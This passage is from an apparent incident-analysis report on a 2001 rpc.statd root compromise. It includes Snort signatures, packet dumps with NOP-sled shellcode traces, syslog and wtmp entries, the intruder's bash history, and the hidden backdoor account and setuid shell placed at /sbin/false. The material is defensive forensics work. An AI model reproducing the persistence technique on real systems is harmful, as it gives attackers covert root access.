(msg: "MV/IDS362/shellcode-x86-nops-udp"; content: "|90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90|";) alert tcp any any -> any any (msg:"MISC - MISC - id check returned root"; content: "uid=0(root)";) ### Probability the source address was spoofed: Very low. While these UDP packets could have been spoofed, it looks very unlikely that they were. First, the portmap request to port 111 would have required a response to inform the attacker that port 610 is where the vulnerable rpc.statd could be found. Further, another clue was seen in the last packet: 03/05-04:34:13.947820 0:3:E3:61:29:50 -> 0:30:71:2C:8:0 type:0x800 len:0xB0 test.network.70.133:39168 -> 148.243.136.7:3909 TCP TTL:63 TOS:0x0 ID:3651 IpLen:20 DgmLen:162 DF ***AP*** Seq: 0xC81E7E72 Ack: 0xC172737E Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 50002261 177275836 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69 64 3D uid=0(root) gid= 30 28 72 6F 6F 74 29 0A 62 69 6E 0A 62 6F 6F 74 0(root).bin.boot 0A 64 65 76 0A 65 74 63 0A 68 6F 6D 65 0A 6C 69 .dev.etc.home.li 62 0A 6C 6F 73 74 2B 66 6F 75 6E 64 0A 6D 69 73 b.lost+found.mis 63 0A 6D 6E 74 0A 6F 70 74 0A 70 72 6F 63 0A 72 c.mnt.opt.proc.r 6F 6F 74 0A 73 62 69 6E 0A 74 66 74 70 62 6F 6F oot.sbin.tftpboo 74 0A 74 6D 70 0A 75 73 72 0A 76 61 72 0A t.tmp.usr.var. This packet is the only one captured by snort from a TCP stream that transpired. It is an ack/push, so it stands to reason that a full three-way handshake had successfully occurred before this packet. While an attacker could forge any TCP flags they chose, this packet originated on my network, and was a response to stimulus from the attacker. The RedHat Linux 6.2 installation's stack would have made sequence number prediction quite difficult, further reducing the odds that the source address could have been spoofed. Basically, the source address was not spoofed. While it is entirely possible that the IP address of this attacker is simply another compromised host, being controlled by the real hostile party, the IP address shown as the source of the attack is almost certainly where this attack was launched from. ### Description of attack: This attack appears to be generated by statdx.c (http://www.securityfocus.com/data/vulnerabilities/exploits/statdx.c). According to whitehats (http://www.whitehats.com/info/IDS442) this attack is CVE-2000-0666 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0666) and BugTraq #1480 (http://www.securityfocus.com/bid/1480). I conducted additional forensic work on the compromised host at the time of the incident. This information can be found here: Detect 2 - Forensics Performed On Host ### Attack mechanism: This attack succeeds by causing the remote rpc.statd daemon to execute code injected by the attacker. Since rpc.statd never drops its root privileges, the attacker's code is executed as root. From the network intrusion analyst/network voyeur's point of view, this detect consisted of a UDP packet sent to the target host's portmap daemon. The attacker requested the target return information about which port the target's rpc.statd daemon listens on. The next three packets from the attacker, which snort alerted on and captured, were the actual attempts to exploit rpc.statd's vulnerability. The packet dumps show many ix86 NOOPS (0x90) followed by something that looks alarmingly similar to /bin/sh. The appearance of something resembling /bin/sh should worry a UNIX admin, as something such as cmd.exe should worry a Windows admin. One might note that the attack seems to have been automated, as the time between the portmapper request and the first exploit packet was just under 1/10th of a second. Also possibly interesting is that the attacker's first probe packet, and his/her three attack packets all originated on ports lower than 1024. If the attacking host is running UNIX, then one might assume that the attacker has root privileges on that host, to be able to open low-numbered ports. Another observation is that the probing packet precedes the first attack packet by 1/10th of a second, while the three attack packets are each separated by two seconds. Then the last packet that snort captured comes in nine minutes later. I would infer that the first four packets were part of the automated attack process. The last packet appears to be the output from the "id" command. Since it came so much later, chronologically, it is possible that it came not as a result of the automated attack, but rather from the actual attacker, working on his/her newly owned host. As for how the actual exploit works, a good technical description of the mechanics already exists on SecurityFocus.com (http://www.securityfocus.com/bid/1480): Further information can be gleaned from the statdx.c source code, written by ron1n : ### Correlations: This attacking IP address had never been observed connecting to any host across any of our networks before. This first contact seems to indicate that the attacker had some prior knowledge of our network. Since this target host's life on the internet was rather short, it is likely that this information was gleaned from a portmap scan which originated from another remote host (controlled by the same adversary) which would have occurred chronologically close to this event. Unfortunately, any such data is no longer available. Making this interesting and potentially valuable correlation opportunity impossible. ### Evidence of active targeting: This attack did seem to come out of nowhere. All traffic alerted on from this attacking host (148.243.136.7) can be viewed at the link below. While this host did conduct portmap scans of several of our networks AFTER this compromise, it was not observed doing so prior to this break-in. It seems that this attacker had some previous knowledge that the portmapper was running on port 111 of this victim host. So, my summary would be that this victim host was not the sole target of this attacker, as this same attacking host was later observed scanning large ranges of IP space looking for portmapper daemons. It is concerning however, that he/she did go right to this host and successfully compromise it, and that this was the first activity we ever saw from this attacking host. Detect 2 - Scans from this attacking host (148.243.136.7) ### Severity: 3 Criticality: 2 This system was a test system placed on the public network without prior approval from the Security Department. It was a stock Redhat 6.2 box with "everything" installed. It didn't survive long in the real world, but it was only a test system, and the engineer had all of his data replicated elsewhere. Further, this box was not dual-homed into any private network segment(s), nor was it "trusted" by any other host, so collateral damage was limited. Lethality: 5 This system gave up root level access after its rpc.statd daemon was successfully compromised via the internet. System Countermeasures: 1 Okay, the OS was reasonably up-to-date, and the root password was not "root," "password," or "toor." I'll give him that, otherwise this box was about as safe as a tourist who drinks the water in Mexico City. The system was unpatched and ran every dangerous, unneeded service that could be activated. I suppose the fact that it was compromised is another indicator that perhaps this host was not up to par. :) Network Countermeasures: 3 I am, perhaps, being generous here. This host was placed on the network in such a way that the PIX was not filtering any traffic for it. It was completely unprotected. The only reason I give it a '3' here is because the network IDS caught this very quickly and the host was taken offline within about 20 minutes. 9. Defensive recommendation: This incident helped to change the suggestion that systems be approved before placed onto the public network into a policy. Future systems so placed, had to be approved by the Security Department prior to going live on the network. Generally speaking, I would recommend that the victim and all other systems to be placed on the publicly-accessible internet should be protected by a restrictively configured firewall. Short of this, this was a Linux system and it would have been trivial to add ipchains rules to this host so that it could do some filtering of its own. Further, such systems should be audited to insure that they only run the services needed to perform their function. This box had no need of portmapper or rpc services. When it is determined which services are required, then it should be ascertained what the latest versions of those programs are, and those should be installed. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Detect 2 - Forensics Performed On Host ========================================================================== Name: na-148-243-131-7.na.avantel.net.mx Address: 148.243.136.7 ################## [~]$ whois 148.243.136.7 nslNIC-Mexico (NETBLK-REDMEX-BNETS)REDMEX-BNETS 148.203.0.0 - 148.250.255.255 Avantel, S.A. (NETBLK-AVANTEL-BL11) AVANTEL-BL11 148.243.0.0 - 148.243.255.255 CAPITEL SYSTEMS SA DE CV (NETBLK-CAPSYS-MX) CAPSYS-MX 148.243.136.0 - 148.243.136.127 ################################### na-148-243-131-7.na.avantel.net.mx NIC-Mexico (NETBLK-REDMEX-BNETS) Av. Eugenio Garza Sada #2501 Sur Monterrey, Nuevo Leon 64849 MX Netname: REDMEX-BNETS Netblock: 148.203.0.0 - 148.250.255.255 Maintainer: MEX Coordinator: Mexico, Administrador Ip (AIM4-ARIN) ipmaster@NIC.MX +52(8) 3875346 (FAX) (8) 3284208 Record last updated on 18-May-1999. Database last updated on 5-Mar-2001 06:33:54 EDT. ######################################## Avantel, S.A. (NETBLK-AVANTEL-BL11) Vasconcelos 130 ote San Pedro, Nuevo Leon 66267 MX Netname: AVANTEL-BL11 Netblock: 148.243.0.0 - 148.243.255.255 Maintainer: AVAN Coordinator: Administrator, Noc (NA83-ARIN) noc@AVANTEL.NET.MX (8) 156 3065 Domain System inverse mapping provided by: DNS1.AVANTEL.NET.MX 200.33.213.66 DNS2.AVANTEL.NET.MX 200.33.209.66 Record last updated on 23-Sep-1999. Database last updated on 5-Mar-2001 06:33:54 EDT. ############################################# CAPITEL SYSTEMS SA DE CV (NETBLK-CAPSYS-MX) SOR JUANA INES DE LA CRUZ 400 NTE TAMPICO, TM 89000 Mexico Netname: CAPSYS-MX Netblock: 148.243.136.0 - 148.243.136.127 Coordinator: RODRIGUEZ, ADOLFO (AR324-ARIN) arlatt@hotmail.com (1) 2186416 Record last updated on 04-May-2000. Database last updated on 5-Mar-2001 06:33:54 EDT. ========================================================================== ###border### last reveals that /var/log/wtmp was apparently not tampered with. reboot system boot 2.2.14-5.0smp Mon Mar 5 12:46 (1+06:28) = =20 sdr pts/1 200.51.210.75 Mon Mar 5 06:20 - 06:20 (00:00) = =20 sdr pts/0 200.51.210.75 Mon Mar 5 06:16 - 06:20 (00:04) = =20 sdr pts/0 200.51.210.75 Mon Mar 5 03:32 - 03:32 (00:00) = =20 root tty2 Thu Mar 1 08:42 - 09:56 (4+01:13) = =20 wtmp begins Thu Mar 1 08:42:54 2001 ###border### /var/log/messages shows the initial buffer overflow of rpc statd. At this = point the intruder had root privilege on the system. Mar 5 03:21:54 vpn1 rpc.statd[433]: gethostbyname error for ^X=F7=FF=BF^X= =F7=FF=BF^Y=F7=FF=BF^Y=F7=FF=BF^Z=F7=FF=BF^Z=F7=FF=BF^[=F7=FF=BF^[=F7=FF=BF= bffff750 8049710 8052c18687465676274736f6d616e797265206520726f7220726f66 = = = = bffff718 = bffff719 bff= ff71a = = bffff71b=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90= =90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90=90 Mar 5 03:32:04 vpn1 PAM_pwdb[11238]: password for (sdr/503) changed by ((n= ull)/0) Mar 5 03:32:35 vpn1 PAM_pwdb[11240]: (login) session opened for user sdr b= y (uid=3D0) Mar 5 03:32:42 vpn1 inetd[763]: pid 11239: exit status 1 Mar 5 04:02:00 vpn1 anacron[11276]: Updated timestamp for job `cron.daily'= to 2001-03-05 Mar 5 04:02:05 vpn1 PAM_pwdb[11389]: (su) session opened for user news by = (uid=3D0) Mar 5 04:02:05 vpn1 PAM_pwdb[11389]: (su) session closed for user news Mar 5 06:16:01 vpn1 PAM_pwdb[11473]: (login) session opened for user sdr b= y (uid=3D0) Mar 5 06:20:01 vpn1 PAM_pwdb[14152]: (login) session opened for user sdr b= y (uid=3D0) Mar 5 06:20:12 vpn1 PAM_pwdb[14152]: (login) session closed for user sdr Mar 5 06:20:12 vpn1 inetd[763]: pid 14151: exit status 1 Mar 5 06:20:16 vpn1 PAM_pwdb[11473]: (login) session closed for user sdr Mar 5 06:20:16 vpn1 inetd[763]: pid 11472: exit status 1 ###border### The intruder then added a regular user account to /etc/passwd. I estimate = that /etc/passwd- shows what the /etc/passwd file temporarily looked like. = It is important to note that the new user sdr's home directory is /tmp. T= he reason for this will become clear later. root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/: xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false named:x:25:25:Named:/var/named:/bin/false gdm:x:42:42::/home/gdm:/bin/bash piranha:x:60:60::/home/httpd/html/piranha:/dev/null postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash pvm:x:24:24::/usr/share/pvm3:/bin/bash squid:x:23:23::/var/spool/squid:/dev/null sdr:x:503:503::/tmp:/bin/bash ###border### The intruder then altered the passwd file to obscure the new account by placing it in the middle of the passwd file. Also, the sdr user's uid and gid are changed, home directory is changed to more closely emulate the home directory of other system daemons, and finally the shell is altered to /sbin/false. The shell change is apparently to suggest that this user can't login, as it has no shell. root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: sdr:x:20:20:sdr:/var/spool/sdr:/sbin/false news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/: xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false named:x:25:25:Named:/var/named:/bin/false gdm:x:42:42::/home/gdm:/bin/bash piranha:x:60:60::/home/httpd/html/piranha:/dev/null postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash pvm:x:24:24::/usr/share/pvm3:/bin/bash squid:x:23:23::/var/spool/squid:/dev/null ###border### Having recalled that the user sdr's home directory was initially /tmp, we examine /tmp/.bash_history. It is becoming clear that either the intruder did not have time, interest, or ability to hide his/her tracks very well. It struck me as odd the attention to detail given to the /etc/passwd file, while leaving other obvious log and other accounting information was not sanitized. This .bash_history file is very revealing. It shows an interesting event in that a file called 'sush' (something like superuser shell?) is copied to /sbin/false. Also the 'cat > tmp' is apparently where he/she entered a script from stdin. This file no longer exists, so some of the intruder's actions are lost. While a full forensic effort might have revealed the data still on the drive platters, grave robbing such as this could have occupied days - weeks. Also since we initially decided to not remove the hard drives, it is likely that we have altered the disks sufficiently to reduce our ability to retrieve this information. Given the criticality and limited damage, the value of this host and therefore its forensic/evidentiary value, I don't believe we've sacrificed any useful data. w ls uname -a cp sush /sbin/false pico /etc/passwd pico /etc/passwd pico /etc/passwd pico /etc/shadow ls rm * exit w cd /var/tmp ls ls -al cd /tmp ls -al cd /var/tmp ls cat > tmp chmod +x tmp =2E/tmp exit ###border### Running 'strings' on the binary /sbin/false file reveals the following. Wh= ile not complete information, it certainly does appear to turn over a roots= hell to sdr when he/she logs in. /lib/ld-linux.so.2 __gmon_start__ libc.so.6 system __deregister_frame_info setgid _IO_stdin_used __libc_start_main setuid __register_frame_info GLIBC_2.0 PTRh QVh8 /bin/bash ###border### A comparison of the compromised system's md5sums and file stat information to that of a new full RedHat 6.2 install reveal changes in keeping with what activity we have witnessed thus far. While evidence of backdoors/trojans/rootkits is limited, this box is still compromised and no longer trustworthy. It will be wiped clean and re-installed by XXXXXXXXX with XXXXXXXXXXX's new internal Linux distribution (which specifically designed for our company's needs, with security in mind). This will give XXXXXXXXX a strong base image from which to build. Note that the integrity check results below were collected trusting only PERL on the compromised system. The md5 implementation was completely self contained in the forensic perl script. (Special thanks go to Dan Farmer for posting his EMT script to the TCT mailing list. This was the tool used to do this quick and dirty file integrity test). The following SxID files are new /sbin/false The following Executable files changed from the trusted dist: /usr/doc/libtool-1.3.4/demo/configure The following non-executable files changed from the trusted dist: /boot/kernel.h /etc/X11/fs/config /etc/conf.linuxconf /etc/group /etc/httpd/conf/access.conf /etc/httpd/conf/httpd.conf /etc/httpd/php3.ini /etc/inetd.conf /etc/info-dir /etc/localtime /etc/mime.types /etc/pam.d/login /etc/pam.d/passwd /etc/pam.d/rlogin /etc/passwd /etc/services /etc/sysconfig/pcmcia /etc/sysctl.conf /etc/syslog.conf /lib/modules/2.2.14-5.0/block/DAC960.o /lib/modules/2.2.14-5.0/block/cpqarray.o /lib/modules/2.2.14-5.0/block/ide-floppy.o /lib/modules/2.2.14-5.0/block/ide-tape.o /lib/modules/2.2.14-5.0/block/linear.o /lib/modules/2.2.14-5.0/block/loop.o /lib/modules/2.2.14-5.0/block/nbd.o /lib/modules/2.2.14-5.0/block/raid0.o /lib/modules/2.2.14-5.0/block/raid1.o /lib/modules/2.2.14-5.0/block/raid5.o /lib/modules/2.2.14-5.0/block/xd.o /lib/modules/2.2.14-5.0/cdrom/aztcd.o /lib/modules/2.2.14-5.0/cdrom/cdu31a.o /lib/modules/2.2.14-5.0/cdrom/cm206.o /lib/modules/2.2.14-5.0/cdrom/gscd.o /lib/modules/2.2.14-5.0/cdrom/isp16.o /lib/modules/2.2.14-5.0/cdrom/mcd.o /lib/modules/2.2.14-5.0/cdrom/mcdx.o /lib/modules/2.2.14-5.0/cdrom/optcd.o /lib/modules/2.2.14-5.0/cdrom/sbpcd.o /lib/modules/2.2.14-5.0/cdrom/sjcd.o /lib/modules/2.2.14-5.0/cdrom/sonycd535.o /lib/modules/2.2.14-5.0/fs/autofs.o /lib/modules/2.2.14-5.0/fs/binfmt_aout.o /lib/modules/2.2.14-5.0/fs/binfmt_java.o /lib/modules/2.2.14-5.0/fs/binfmt_misc.o /lib/modules/2.2.14-5.0/fs/coda.o /lib/modules/2.2.14-5.0/fs/fat.o /lib/modules/2.2.14-5.0/fs/hfs.o /lib/modules/2.2.14-5.0/fs/hpfs.o /lib/modules/2.2.14-5.0/fs/lockd.o /lib/modules/2.2.14-5.0/fs/minix.o /lib/modules/2.2.14-5.0/fs/msdos.o /lib/modules/2.2.14-5.0/fs/ncpfs.o /lib/modules/2.2.14-5.0/fs/nfs.o /lib/modules/2.2.14-5.0/fs/nfsd.o /lib/modules/2.2.14-5.0/fs/nls_cp437.o /lib/modules/2.2.14-5.0/fs/nls_cp737.o /lib/modules/2.2.14-5.0/fs/nls_cp775.o /lib/modules/2.2.14-5.0/fs/nls_cp850.o /lib/modules/2.2.14-5.0/fs/nls_cp852.o /lib/modules/2.2.14-5.0/fs/nls_cp855.o /lib/modules/2.2.14-5.0/fs/nls_cp857.o /lib/modules/2.2.14-5.0/fs/nls_cp860.o /lib/modules/2.2.14-5.0/fs/nls_cp861.o /lib/modules/2.2.14-5.0/fs/nls_cp862.o /lib/modules/2.2.14-5.0/fs/nls_cp863.o /lib/modules/2.2.14-5.0/fs/nls_cp864.o /lib/modules/2.2.14-5.0/fs/nls_cp865.o /lib/modules/2.2.14-5.0/fs/nls_cp866.o /lib/modules/2.2.14-5.0/fs/nls_cp869.o /lib/modules/2.2.14-5.0/fs/nls_cp874.o /lib/modules/2.2.14-5.0/fs/nls_iso8859-1.o /lib/modules/2.2.14-5.0/fs/nls_iso8859-14.o /lib/modules/2.2.14-5.0/fs/nls_iso8859-15.o /lib/modules/2.2.14-5.0/fs/nls_iso8859-2.o /lib/modules/2.2.14-5.0/fs/nls_iso8859-3.o /lib/modules/2.2.14-5.0/fs/nls_iso8859-4.o /lib/modules/2.2.14-5.0/fs/nls_iso8859-5.o /lib/modules/2.2.14-5.0/fs/nls_iso8859-6.o /lib/modules/2.2.14-5.0/fs/nls_iso8859-7.o /lib/modules/2.2.14-5.0/fs/nls_iso8859-8.o /lib/modules/2.2.14-5.0/fs/nls_iso8859-9.o /lib/modules/2.2.14-5.0/fs/nls_koi8-r.o /lib/modules/2.2.14-5.0/fs/romfs.o /lib/modules/2.2.14-5.0/fs/smbfs.o /lib/modules/2.2.14-5.0/fs/sysv.o /lib/modules/2.2.14-5.0/fs/ufs.o /lib/modules/2.2.14-5.0/fs/umsdos.o /lib/modules/2.2.14-5.0/fs/vfat.o /lib/modules/2.2.14-5.0/ipv4/ip_masq_autofw.o /lib/modules/2.2.14-5.0/ipv4/ip_masq_cuseeme.o /lib/modules/2.2.14-5.0/ipv4/ip_masq_ftp.o /lib/modules/2.2.14-5.0/ipv4/ip_masq_irc.o /lib/modules/2.2.14-5.0/ipv4/ip_masq_mfw.o /lib/modules/2.2.14-5.0/ipv4/ip_masq_portfw.o /lib/modules/2.2.14-5.0/ipv4/ip_masq_quake.o /lib/modules/2.2.14-5.0/ipv4/ip_masq_raudio.o /lib/modules/2.2.14-5.0/ipv4/ip_masq_user.o /lib/modules/2.2.14-5.0/ipv4/ip_masq_vdolive.o /lib/modules/2.2.14-5.0/ipv4/ip_vs_lc.o /lib/modules/2.2.14-5.0/ipv4/ip_vs_rr.o /lib/modules/2.2.14-5.0/ipv4/ip_vs_wlc.o /lib/modules/2.2.14-5.0/ipv4/ip_vs_wrr.o /lib/modules/2.2.14-5.0/ipv4/rarp.o /lib/modules/2.2.14-5.0/misc/aci.o /lib/modules/2.2.14-5.0/misc/acquirewdt.o /lib/modules/2.2.14-5.0/misc/actisys.o /lib/modules/2.2.14-5.0/misc/ad1816.o /lib/modules/2.2.14-5.0/misc/ad1848.o /lib/modules/2.2.14-5.0/misc/adlib_card.o /lib/modules/2.2.14-5.0/misc/aedsp16.o /lib/modules/2.2.14-5.0/misc/aten.o /lib/modules/2.2.14-5.0/misc/atixlmouse.o /lib/modules/2.2.14-5.0/misc/awe_wave.o /lib/modules/2.2.14-5.0/misc/b1.o /lib/modules/2.2.14-5.0/misc/b1isa.o /lib/modules/2.2.14-5.0/misc/b1pci.o /lib/modules/2.2.14-5.0/misc/bpck.o /lib/modules/2.2.14-5.0/misc/bttv.o /lib/modules/2.2.14-5.0/misc/busmouse.o /lib/modules/2.2.14-5.0/misc/buz.o /lib/modules/2.2.14-5.0/misc/bw-qcam.o /lib/modules/2.2.14-5.0/misc/c-qcam.o /lib/modules/2.2.14-5.0/misc/capi.o /lib/modules/2.2.14-5.0/misc/capidrv.o /lib/modules/2.2.14-5.0/misc/capiutil.o /lib/modules/2.2.14-5.0/misc/cmpci.o /lib/modules/2.2.14-5.0/misc/comm.o /lib/modules/2.2.14-5.0/misc/cs4232.o /lib/modules/2.2.14-5.0/misc/cyclades.o /lib/modules/2.2.14-5.0/misc/dstr.o /lib/modules/2.2.14-5.0/misc/dtlk.o /lib/modules/2.2.14-5.0/misc/emu10k1.o /lib/modules/2.2.14-5.0/misc/epat.o /lib/modules/2.2.14-5.0/misc/epca.o /lib/modules/2.2.14-5.0/misc/epia.o /lib/modules/2.2.14-5.0/misc/es1370.o /lib/modules/2.2.14-5.0/misc/es1371.o /lib/modules/2.2.14-5.0/misc/esi.o /lib/modules/2.2.14-5.0/misc/esp.o /lib/modules/2.2.14-5.0/misc/esssolo1.o /lib/modules/2.2.14-5.0/misc/fit2.o /lib/modules/2.2.14-5.0/misc/fit3.o /lib/modules/2.2.14-5.0/misc/friq.o /lib/modules/2.2.14-5.0/misc/frpw.o /lib/modules/2.2.14-5.0/misc/ftape.o /lib/modules/2.2.14-5.0/misc/girbil.o /lib/modules/2.2.14-5.0/misc/gus.o /lib/modules/2.2.14-5.0/misc/hisax.o /lib/modules/2.2.14-5.0/misc/i2c.o /lib/modules/2.2.14-5.0/misc/icn.o /lib/modules/2.2.14-5.0/misc/ip2.o /lib/modules/2.2.14-5.0/misc/ip2main.o /lib/modules/2.2.14-5.0/misc/iph5526.o /lib/modules/2.2.14-5.0/misc/ircomm_tty.o /lib/modules/2.2.14-5.0/misc/irlpt.o /lib/modules/2.2.14-5.0/misc/irlpt_client.o /lib/modules/2.2.14-5.0/misc/irlpt_server.o /lib/modules/2.2.14-5.0/misc/irport.o /lib/modules/2.2.14-5.0/misc/irtty.o /lib/modules/2.2.14-5.0/misc/isdn.o /lib/modules/2.2.14-5.0/misc/isdn_bsdcomp.o /lib/modules/2.2.14-5.0/misc/isdnloop.o /lib/modules/2.2.14-5.0/misc/isicom.o /lib/modules/2.2.14-5.0/misc/istallion.o /lib/modules/2.2.14-5.0/misc/ixj.o /lib/modules/2.2.14-5.0/misc/joy-analog.o /lib/modules/2.2.14-5.0/misc/joy-assassin.o /lib/modules/2.2.14-5.0/misc/joy-console.o /lib/modules/2.2.14-5.0/misc/joy-creative.o /lib/modules/2.2.14-5.0/misc/joy-db9.o /lib/modules/2.2.14-5.0/misc/joy-gravis.o /lib/modules/2.2.14-5.0/misc/joy-lightning.o /lib/modules/2.2.14-5.0/misc/joy-logitech.o /lib/modules/2.2.14-5.0/misc/joy-magellan.o /lib/modules/2.2.14-5.0/misc/joy-pci.o /lib/modules/2.2.14-5.0/misc/joy-sidewinder.o /lib/modules/2.2.14-5.0/misc/joy-spaceball.o /lib/modules/2.2.14-5.0/misc/joy-spaceorb.o /lib/modules/2.2.14-5.0/misc/joy-thrustmaster.o /lib/modules/2.2.14-5.0/misc/joy-turbografx.o /lib/modules/2.2.14-5.0/misc/joy-warrior.o /lib/modules/2.2.14-5.0/misc/joystick.o /lib/modules/2.2.14-5.0/misc/kbic.o /lib/modules/2.2.14-5.0/misc/kernelcapi.o /lib/modules/2.2.14-5.0/misc/ktti.o /lib/modules/2.2.14-5.0/misc/litelink.o /lib/modules/2.2.14-5.0/misc/lp.o /lib/modules/2.2.14-5.0/misc/mad16.o /lib/modules/2.2.14-5.0/misc/maestro.o /lib/modules/2.2.14-5.0/misc/maui.o /lib/modules/2.2.14-5.0/misc/moxa.o /lib/modules/2.2.14-5.0/misc/mpu401.o /lib/modules/2.2.14-5.0/misc/msbusmouse.o /lib/modules/2.2.14-5.0/misc/msnd.o /lib/modules/2.2.14-5.0/misc/msnd_classic.o /lib/modules/2.2.14-5.0/misc/msnd_pinnacle.o /lib/modules/2.2.14-5.0/misc/msp3400.o /lib/modules/2.2.14-5.0/misc/mxser.o /lib/modules/2.2.14-5.0/misc/n_hdlc.o /lib/modules/2.2.14-5.0/misc/nm256.o /lib/modules/2.2.14-5.0/misc/nvram.o /lib/modules/2.2.14-5.0/misc/on20.o /lib/modules/2.2.14-5.0/misc/on26.o /lib/modules/2.2.14-5.0/misc/opl3.o /lib/modules/2.2.14-5.0/misc/opl3sa.o /lib/modules/2.2.14-5.0/misc/opl3sa2.o /lib/modules/2.2.14-5.0/misc/paride.o /lib/modules/2.2.14-5.0/misc/parport.o /lib/modules/2.2.14-5.0/misc/parport_pc.o /lib/modules/2.2.14-5.0/misc/parport_probe.o /lib/modules/2.2.14-5.0/misc/pas2.o /lib/modules/2.2.14-5.0/misc/pc110pad.o /lib/modules/2.2.14-5.0/misc/pc87108.o /lib/modules/2.2.14-5.0/misc/pcbit.o /lib/modules/2.2.14-5.0/misc/pcd.o /lib/modules/2.2.14-5.0/misc/pcwd.o /lib/modules/2.2.14-5.0/misc/pd.o /lib/modules/2.2.14-5.0/misc/pf.o /lib/modules/2.2.14-5.0/misc/pg.o /lib/modules/2.2.14-5.0/misc/phonedev.o /lib/modules/2.2.14-5.0/misc/pms.o /lib/modules/2.2.14-5.0/misc/pss.o /lib/modules/2.2.14-5.0/misc/pt.o /lib/modules/2.2.14-5.0/misc/qpmouse.o /lib/modules/2.2.14-5.0/misc/radio-aimslab.o /lib/modules/2.2.14-5.0/misc/radio-aztech.o /lib/modules/2.2.14-5.0/misc/radio-cadet.o /lib/modules/2.2.14-5.0/misc/radio-gemtek.o /lib/modules/2.2.14-5.0/misc/radio-miropcm20.o /lib/modules/2.2.14-5.0/misc/radio-rtrack2.o /lib/modules/2.2.14-5.0/misc/radio-sf16fmi.o /lib/modules/2.2.14-5.0/misc/radio-trust.o /lib/modules/2.2.14-5.0/misc/radio-typhoon.o /lib/modules/2.2.14-5.0/misc/radio-zoltrix.o /lib/modules/2.2.14-5.0/misc/riscom8.o /lib/modules/2.2.14-5.0/misc/rocket.o /lib/modules/2.2.14-5.0/misc/saa5249.o /lib/modules/2.2.14-5.0/misc/saa7111.o /lib/modules/2.2.14-5.0/misc/saa7185.o /lib/modules/2.2.14-5.0/misc/sb.o /lib/modules/2.2.14-5.0/misc/sgalaxy.o /lib/modules/2.2.14-5.0/misc/smc-ircc.o /lib/modules/2.2.14-5.0/misc/softdog.o /lib/modules/2.2.14-5.0/misc/softoss2.o /lib/modules/2.2.14-5.0/misc/sonicvibes.o /lib/modules/2.2.14-5.0/misc/sound.o /lib/modules/2.2.14-5.0/misc/soundcore.o /lib/modules/2.2.14-5.0/misc/soundlow.o /lib/modules/2.2.14-5.0/misc/specialix.o /lib/modules/2.2.14-5.0/misc/sscape.o /lib/modules/2.2.14-5.0/misc/stallion.o /lib/modules/2.2.14-5.0/misc/sunrpc.o /lib/modules/2.2.14-5.0/misc/sx.o /lib/modules/2.2.14-5.0/misc/synclink.o /lib/modules/2.2.14-5.0/misc/t1isa.o /lib/modules/2.2.14-5.0/misc/t1pci.o /lib/modules/2.2.14-5.0/misc/tekram.o /lib/modules/2.2.14-5.0/misc/toshoboe.o /lib/modules/2.2.14-5.0/misc/trix.o /lib/modules/2.2.14-5.0/misc/tuner.o /lib/modules/2.2.14-5.0/misc/uart401.o /lib/modules/2.2.14-5.0/misc/uircc.o /lib/modules/2.2.14-5.0/misc/v_midi.o /lib/modules/2.2.14-5.0/misc/via82cxxx.o /lib/modules/2.2.14-5.0/misc/videodev.o /lib/modules/2.2.14-5.0/misc/w83977af_ir.o /lib/modules/2.2.14-5.0/misc/wanrouter.o /lib/modules/2.2.14-5.0/misc/wavefront.o /lib/modules/2.2.14-5.0/misc/wdt.o /lib/modules/2.2.14-5.0/misc/zft-compressor.o /lib/modules/2.2.14-5.0/misc/zftape.o /lib/modules/2.2.14-5.0/net/3c501.o 